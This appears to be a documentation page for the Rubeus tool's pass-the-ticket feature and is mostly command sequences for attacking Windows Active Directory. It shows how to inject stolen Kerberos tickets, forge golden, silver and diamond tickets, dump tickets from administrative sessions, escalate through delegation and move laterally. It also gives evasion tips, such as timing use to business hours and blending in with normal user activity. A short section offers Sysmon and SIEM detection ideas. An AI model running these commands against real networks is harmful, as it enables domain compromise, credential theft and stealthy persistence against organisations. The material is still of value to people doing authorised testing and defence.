Pass-the-ticket: inject Kerberos tickets into the current session
Pass-the-Ticket (PTT) is a fundamental technique for credential reuse in Kerberos environments, enabling the use of extracted or forged tickets without requiring password knowledge.
Pass-the-ticket (PTT) injects Kerberos tickets into logon sessions, enabling authentication to services using previously extracted or forged tickets. This technique bypasses traditional password-based authentication and is essential for lateral movement and privilege escalation.
# Inject ticket from .kirbi fileRubeus.exe ptt /ticket:C:\temp\admin.kirbi# Inject with relative pathRubeus.exe ptt /ticket:tickets\domain_admin.kirbi# Inject multiple ticketsRubeus.exe ptt /ticket:ticket1.kirbiRubeus.exe ptt /ticket:ticket2.kirbi
Copy
Ask AI
# Inject into current user session (default)Rubeus.exe ptt /ticket:user_ticket.kirbi# Verify injection successRubeus.exe klist
Copy
Ask AI
# Extract from one systemRubeus.exe dump /service:krbtgt /outfile:extracted.kirbi# Inject on another systemRubeus.exe ptt /ticket:extracted.kirbi# Verify and useRubeus.exe klistdir \\target.corp.local\c$
# Inject extracted TGTRubeus.exe ptt /ticket:extracted_tgt.kirbi# Inject forged golden ticketRubeus.exe ptt /ticket:golden_ticket.kirbi# Test TGT functionalityRubeus.exe asktgs /service:cifs/fileserver.corp.local /ptt
TGTs provide the most flexibility as they can be used to request any service ticket within their privilege scope.
Hide Service Ticket Characteristics
Properties:
Provide access to specific services only
Limited scope but immediate usability
Typically shorter validity periods
Service-specific permissions
Common Service Types:
CIFS: File system access
HOST: Administrative access
LDAP: Directory service access
HTTP: Web application access
MSSQL: Database access
Copy
Ask AI
# Inject CIFS service ticketRubeus.exe ptt /ticket:cifs_ticket.kirbi# Test file access immediatelydir \\fileserver.corp.local\share# Inject HOST ticket for admin accessRubeus.exe ptt /ticket:host_ticket.kirbipsexec \\target.corp.local cmd
Service tickets provide immediate access to specific services but cannot be used to request additional tickets.
Hide Golden Tickets
Characteristics:
Domain-wide TGTs forged with KRBTGT hash
Provide complete domain access
Long validity periods (up to 10 years)
Appear legitimate to domain controllers
Copy
Ask AI
# Create and inject golden ticketRubeus.exe golden /user:admin /rc4:krbtgt_hash /ldap /outfile:golden.kirbiRubeus.exe ptt /ticket:golden.kirbi
Show Silver Tickets
Characteristics:
Service-specific tickets forged with service hash
Limited to specific service access
Bypass domain controller validation
Useful for targeted attacks
Copy
Ask AI
# Create and inject silver ticketRubeus.exe silver /user:admin /service:cifs/fileserver.corp.local /rc4:service_hash /outfile:silver.kirbiRubeus.exe ptt /ticket:silver.kirbi
Show Diamond Tickets
Characteristics:
Hybrid approach combining legitimate and forged elements
Enhanced stealth capabilities
Use real authentication with privilege modifications
Most sophisticated forgery technique
Copy
Ask AI
# Create and inject diamond ticketRubeus.exe diamond /user:user /password:pass /krbkey:krbtgt_key /groups:512 /outfile:diamond.kirbiRubeus.exe ptt /ticket:diamond.kirbi
# Basic injection into current sessionRubeus.exe ptt /ticket:user_ticket.kirbi# Verify injectionRubeus.exe klist# Test accessdir \\target.corp.local\share
Show Use Cases
Typical Scenarios:
Standard credential reuse
User-context lateral movement
Service access with current privileges
Testing extracted credentials
Hide LUID Targeting
Elevated Requirements:
Requires administrative privileges
Can target any logon session on system
Enables cross-user ticket injection
Advanced persistence techniques
Copy
Ask AI
# Enumerate available sessionsRubeus.exe logonsession# Inject into specific sessionRubeus.exe ptt /ticket:admin.kirbi /luid:0x54321# Verify injection in target sessionRubeus.exe klist /luid:0x54321
Show Strategic Applications
Advanced Use Cases:
Inject into service account sessions
Target administrative sessions
Cross-user authentication
System-wide credential distribution
Hide Machine Account Operations
SYSTEM Session (LUID 0x3e7):
Machine account context
Highest privilege level
Used for computer authentication
Critical for domain operations
Copy
Ask AI
# Inject machine account ticketRubeus.exe ptt /ticket:machine_tgt.kirbi /luid:0x3e7# Test machine account accessRubeus.exe asktgs /service:ldap/dc01.corp.local
[*] Action: Import Ticket[+] Ticket successfully imported![!] WARNING: PAC validation failed for the ticket[!] This may indicate a forged or corrupted ticket[!] Authentication may fail for some services[*] Target LUID: 0x54321[*] Username: admin@CORP.LOCAL
PAC validation warnings may indicate:
Forged tickets with invalid signatures
Expired or corrupted tickets
Cross-domain trust issues
Service-specific validation problems
Copy
Ask AI
[!] Unhandled Rubeus exception:System.ComponentModel.Win32Exception: Access is denied at Rubeus.LSA.ImportTicket(Byte[] ticket, UInt64 targetLuid)[!] Unable to import ticket - check LUID and privileges[!] Cross-session injection requires administrative privileges
Common error scenarios:
Access denied: Insufficient privileges for target LUID
# Extract from current systemRubeus.exe dump /service:krbtgt /outfile:extracted.kirbi# Extract via delegationRubeus.exe tgtdeleg /outfile:delegated.kirbi# Monitor for new ticketsRubeus.exe monitor /filteruser:admin
2
Ticket Injection
Inject acquired tickets into appropriate sessions:
Copy
Ask AI
# Inject into current sessionRubeus.exe ptt /ticket:acquired_ticket.kirbi# Inject into specific session (if elevated)Rubeus.exe ptt /ticket:admin_ticket.kirbi /luid:0x54321
3
Verification
Verify successful injection and test functionality:
Copy
Ask AI
# List current ticketsRubeus.exe klist# Describe injected ticketRubeus.exe describe /ticket:injected_ticket.kirbi# Test service accessdir \\target.corp.local\c$
# Extract TGT from System ARubeus.exe dump /service:krbtgt /outfile:admin_tgt.kirbi# Transfer to System B and injectRubeus.exe ptt /ticket:admin_tgt.kirbi# Access resources from System BRubeus.exe asktgs /service:cifs/fileserver.corp.localdir \\fileserver.corp.local\admin_share
Show Multi-Hop Operations
Copy
Ask AI
# Hop 1: Initial system with user credentialsRubeus.exe asktgt /user:user /password:pass /ptt# Extract for transferRubeus.exe dump /service:krbtgt /outfile:user_tgt.kirbi# Hop 2: Intermediate systemRubeus.exe ptt /ticket:user_tgt.kirbiRubeus.exe kerberoast /outfile:service_hashes.txt# Hop 3: Final target with cracked service accountRubeus.exe asktgt /user:svc_sql /password:cracked_pass /ptt
Hide Session Hijacking
Copy
Ask AI
# Enumerate sessions for high-privilege accountsRubeus.exe logonsession# Extract tickets from administrative sessionsRubeus.exe dump /luid:0x54321 /service:krbtgt /outfile:admin_tgt.kirbi# Inject into current session for privilege escalationRubeus.exe ptt /ticket:admin_tgt.kirbi# Test elevated accessdir \\dc01.corp.local\c$
Show Service Account Escalation
Copy
Ask AI
# Start with limited service accountRubeus.exe ptt /ticket:service_ticket.kirbi# Use delegation rights for escalationRubeus.exe s4u /ticket:service_ticket.kirbi /impersonateuser:admin /msdsspn:cifs/target.corp.local /ptt# Access target with elevated privilegesdir \\target.corp.local\c$
Hide Golden Ticket Deployment
Copy
Ask AI
# Create multiple golden tickets for redundancyRubeus.exe golden /user:admin /rc4:krbtgt_hash /ldap /outfile:admin_golden.kirbiRubeus.exe golden /user:backup_admin /rc4:krbtgt_hash /ldap /outfile:backup_golden.kirbi# Deploy across multiple systems# System 1Rubeus.exe ptt /ticket:admin_golden.kirbi# System 2Rubeus.exe ptt /ticket:backup_golden.kirbi# Test persistent accessRubeus.exe asktgs /service:cifs/fileserver.corp.local
Show Service-Specific Persistence
Copy
Ask AI
# Create silver tickets for specific servicesRubeus.exe silver /user:admin /service:cifs/fileserver.corp.local /rc4:service_hash /outfile:file_silver.kirbiRubeus.exe silver /user:admin /service:mssql/sqlserver.corp.local /rc4:sql_hash /outfile:sql_silver.kirbi# Deploy service-specific accessRubeus.exe ptt /ticket:file_silver.kirbiRubeus.exe ptt /ticket:sql_silver.kirbi
Service accounts performing interactive operations
Authentication outside normal business hours
Geographic or network location anomalies
Show Event Log Analysis
Windows Event Logs:
Missing expected logon events (4624)
Service access without TGT requests
Unusual authentication package usage
Cross-LUID operations requiring elevation
Kerberos Event Monitoring:
TGS usage without corresponding TGT acquisition
Unusual encryption types or ticket characteristics
Service access patterns inconsistent with user behavior
Hide Timing Considerations
Copy
Ask AI
# Inject tickets during business hours# Schedule: 9:00 AM - 5:00 PM business hours# Use realistic timing between injection and usageRubeus.exe ptt /ticket:admin.kirbi# Wait 2-5 minutes before first accessdir \\target.corp.local\share
Show Behavioral Blending
Copy
Ask AI
# Use tickets consistent with user's normal activitiesRubeus.exe ptt /ticket:user_appropriate_ticket.kirbi# Access resources the user normally accessesdir \\fileserver.corp.local\user_documents# Avoid obviously administrative actions immediately after injection# Wait for normal business activities before escalating
Show Technical Evasion
Copy
Ask AI
# Use current session when possible (avoid LUID targeting)Rubeus.exe ptt /ticket:ticket.kirbi# Prefer legitimate extracted tickets over forged ones# Extracted tickets have better chance of passing validation# Use service-specific tickets rather than broad TGTs when possibleRubeus.exe ptt /ticket:specific_service.kirbi
Show Detection Implementation
Host-Based Monitoring:
Monitor LSA authentication package interactions
Implement process behavior analysis
Track memory access to LSASS process
Alert on unusual API call patterns
Sysmon Configuration:
Copy
Ask AI
<!-- Monitor process access to LSASS --><ProcessAccess onmatch="include"> <TargetImage>lsass.exe</TargetImage> <GrantedAccess>0x1fffff</GrantedAccess></ProcessAccess>
Show Behavioral Analysis
SIEM Rules:
Copy
Ask AI
-- Detect authentication without logonSELECT * FROM eventsWHERE service_access = trueAND logon_event = falseAND time_diff < 5_minutes-- Unusual cross-session activitiesSELECT * FROM eventsWHERE elevated_privileges = trueAND process_owner != session_owner
Problem: Cannot inject into specific LUIDSolutions:
Verify current user has administrative privileges
Check if target LUID exists and is accessible
Try injecting into current session instead
Verify anti-malware isn’t blocking injection
Copy
Ask AI
# Check current privilegeswhoami /priv# Enumerate available sessionsRubeus.exe logonsession# Try current session injectionRubeus.exe ptt /ticket:ticket.kirbi
Problem: Invalid ticket format or corruptionSolutions:
Verify ticket file integrity
Check base64 encoding for completeness
Ensure ticket hasn’t expired
Try extracting ticket again from source
Copy
Ask AI
# Describe ticket to check validityRubeus.exe describe /ticket:suspect_ticket.kirbi# Check file size and contentsdir ticket.kirbi# Try different ticket formatRubeus.exe ptt /ticket:base64_encoded_ticket_data
Problem: Injected ticket doesn’t provide expected accessSolutions:
Verify ticket was injected successfully
Check ticket permissions and group memberships
Ensure target services are accessible
Verify ticket hasn’t expired
Copy
Ask AI
# Verify injection successRubeus.exe klist# Check ticket contentsRubeus.exe describe /ticket:injected_ticket.kirbi# Test with known working servicedir \\known_accessible_share
